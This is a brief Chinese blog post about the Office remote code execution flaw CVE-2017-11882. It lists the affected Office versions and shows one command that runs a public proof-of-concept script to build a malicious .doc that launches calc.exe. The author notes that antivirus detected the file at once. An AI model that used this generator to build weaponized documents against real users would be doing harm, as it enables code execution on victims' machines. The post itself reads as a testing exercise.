office远程代码执行(CVE-2017-11882)
2018-04-28 本文已影响0人
MrSquidward
office远程代码执行(CVE-2017-11882)
影响版本:
MicrosoftOffice 2000
MicrosoftOffice 2003
MicrosoftOffice 2007 Service Pack 3
MicrosoftOffice 2010 Service Pack 2
MicrosoftOffice 2013 Service Pack 1
MicrosoftOffice 2016
1. 生成含有恶意代码的POC
python2 .\Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe"-o test.doc
然而并没什么卵用,生成完刚一打开,就被火绒检测出来了,windows defender都不用打开,直接查杀了。。。。。
image